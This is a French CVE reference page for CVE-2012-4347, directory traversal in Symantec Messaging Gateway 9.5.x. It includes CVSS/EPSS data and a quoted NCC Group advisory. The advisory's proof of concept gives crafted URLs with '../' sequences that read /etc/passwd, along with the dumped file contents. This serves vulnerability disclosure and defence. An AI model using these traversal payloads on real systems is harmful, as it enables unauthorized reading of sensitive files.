CVE-2012-4347 : Détail

CVE-2012-4347

Directory Traversal
A01-Broken Access Control
83.32%V3
Network
2012-12-05
10h00 +00:00
2012-12-20
09h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Multiple directory traversal vulnerabilities in the management console in Symantec Messaging Gateway (SMG) 9.5.x allow remote authenticated users to read arbitrary files via a .. (dot dot) in the (1) logFile parameter in a logs action to brightmail/export or (2) localBackupFileSelection parameter in an APPLIANCE restoreSource action to brightmail/admin/restore/download.do.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 23110

Date de publication : 2012-12-02 23h00 +00:00
Auteur : Ben Williams
EDB Vérifié : No

======= Summary ======= Name: Symantec Messaging Gateway - Arbitrary file download is possible with a crafted URL (authenticated) Release Date: 30 November 2012 Reference: NGS00266 Discoverer: Ben Williams <ben.williams@ngssecure.com> Vendor: Symantec Vendor Reference: Systems Affected: Symantec Messaging Gateway 9.5.3-3 Risk: Medium Status: Published ======== TimeLine ======== Discovered: 17 April 2012 Released: 17 April 2012 Approved: 29 April 2012 Reported: 30 April 2012 Fixed: 27 August 2012 Published: 30 November 2012 =========== Description =========== I. VULNERABILITY ------------------------- Symantec Messaging Gateway 9.5.3-3 - Arbitrary file download is possible with a crafted URL (authenticated) II. BACKGROUND ------------------------- Symantec Messaging Gateway 9.5.3-3 is the latest version, of their Email Security Appliance III. DESCRIPTION ------------------------- The vulnerability would enable an attacker (who has authenticated to the web interface) to download arbitrary files from the appliance with the permissions of the Webserver user ================= Technical Details ================= IV. PROOF OF CONCEPT ------------------------- Various files containing sensitive information can be downloaded using a crafted URL for example: http://192.168.1.59:41080/brightmail/export?type=logs&logFile=../../../etc/passwd&logType=1&browserType=1 Which produces a file containing: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin postfix:x:100:101::/home/postfix:/bin/bash mailwall:x:500:501::/home/mailwall:/bin/bash mysql:x:501:103::/home/mysql:/bin/bash bcc:x:502:99::/home/bcc:/bin/bash support:x:503:503::/home/support:/bin/bash admin:x:504:501::/home/admin:/bin/rbash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin Simliar issues can be seen in other places such as here: http://192.168.1.59:41080/brightmail/admin/restore/download.do?no-cache=false&displayTab=restore&restoreSource=APPLIANCE&localBackupFileSelection=../../etc/passwd =============== Fix Information =============== An updated version of the software has been released to address the vulnerability: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120827_00 NCC Group Research http://www.nccgroup.com/research For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br> This email message has been delivered safely and archived online by Mimecast. </a>

Products Mentioned

Configuraton 0

Symantec>>Messaging_gateway >> Version 9.5

Symantec>>Messaging_gateway >> Version 9.5.1

Symantec>>Messaging_gateway >> Version 9.5.2

Symantec>>Messaging_gateway >> Version 9.5.3

Symantec>>Messaging_gateway >> Version 9.5.4

Références

http://www.securityfocus.com/bid/56789
Tags : vdb-entry, x_refsource_BID